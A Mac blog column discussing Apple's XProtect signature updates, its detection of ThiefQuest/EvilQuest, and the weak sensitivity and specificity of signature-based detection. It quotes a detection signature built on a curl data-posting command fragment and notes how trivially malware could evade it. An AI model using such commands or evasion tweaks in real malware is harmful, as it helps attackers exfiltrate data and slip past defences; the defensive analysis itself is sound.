Last Week on My Mac: Malware detection games

macOS security protection comes and goes. Until almost a year ago, Gatekeeper and MRT were all the rage, and every couple of weeks, Apple pushed updates to them both. Gatekeeper went from version 162 in February 2019 to 181 by August of last year; MRT progressed from 1.39 to 1.48 over the same period, as XProtect crawled from 2101 to a mere 2105.

Catalina brought very different patterns: over the last year, Gatekeeper seems to have been forgotten, with XProtect and MRT forging ahead, their updates being pushed every two weeks until WWDC broke that rhythm. Then, between 29 June and 13 July, we’ve gone through three versions of XProtect’s data files, 2124, 2125 and 2126.

This emphasis on XProtect is because of changed security policies. In Catalina, whenever you open an app or run a command tool, irrespective of whether it has a quarantine flag attached, it’s passed to XProtect to check it for malware. Gatekeeper’s signature checks have been eclipsed by the requirement not just for code signing, but for notarization as well. These leave users of older versions of macOS out on a limb, though, with XProtect checks only being called when the quarantine flag is set, and nothing to require notarization.

Discovering what has changed in each of these security data updates has become a childish game. Instead of XProtect’s detection rules referring to malware by its generally recognised names (as it once did), Apple now uses a coded naming system, which security researchers then have to decode to discover what each update does. The last two updates, XProtect 2125 and 2126, haven’t taken much effort, in view of the recent appearance of ThiefQuest/EvilQuest, which at first appeared to be simple ransomware, but turns out to be rather more sophisticated.

Apple pushed XProtect 2125 out of cycle, with a single added detection rule, for something it named MACOS.6cb9746. As soon as I saw that, I suspected that this was an attempt to detect ThiefQuest, which Patrick Wardle quickly confirmed against his sample of the malware. Breaking Apple’s codename thus proved rather easier than some of my weekend Mac riddles. Where Apple had fallen short was in detecting only one of the two variants of ThiefQuest which have been found, something as easy to discover as the identity of MACOS.6cb9746.

A week later, Apple pushed another out of cycle update to XProtect’s data, version 2126. This modifies the detection signature for ThiefQuest/MACOS.6cb9746 to enable detection of both current variants, and adds detection of new malware named so helpfully MACOS.2070d41. Although I’m not aware that the latter has been identified against anything specific, security researchers quickly discovered that its signature was the compiled AppleScript string based on the shell command
curl --connect-timeout 10 -ks -d

Although I doubt whether it’s particularly common, that could of course occur in perfectly innocent AppleScript. What’s more, it’s easily changed in malware to evade detection by XProtect: all the malware author has to do is to change the --connect-timeout setting to a different number.

In the course of the current Covid-19 pandemic, we’ve all become armchair experts on clinical testing. Concepts such as false positives and negatives, and test sensitivity and specificity, have become widely discussed, and I’m sure that you can see their relevance here. XProtect, Catalina’s front line malware diagnostic system, has here demonstrated one rule for detecting ThiefQuest/MACOS.6cb9746 which should already have been known to have a high false negative rate. In the next version, Apple had to fix that, and added a new rule which, the moment it appeared, must have had a significant false positive rate and a rapidly growing false negative rate.

If you’re running Catalina or later, XProtect is proving good protection against the malware of a couple of weeks ago. Much depends, though, on those writing its detection rules achieving excellent sensitivity and specificity, as with any diagnostic test. Most importantly, it provides no protection at all against emergent malware. Until Apple has a sample to test against, constructs and assesses a rule, and pushes the next update to XProtect’s data, no Mac user is protected from that malware. Over a period of 7-10 days, that can put an awful lot of users at risk.

Signature-based malware detection is the oldest technique, and well-known for this ceaseless game of cat and mouse. Apple’s Tom has been chasing hard again, but I can’t see has got any closer to catching Jerry.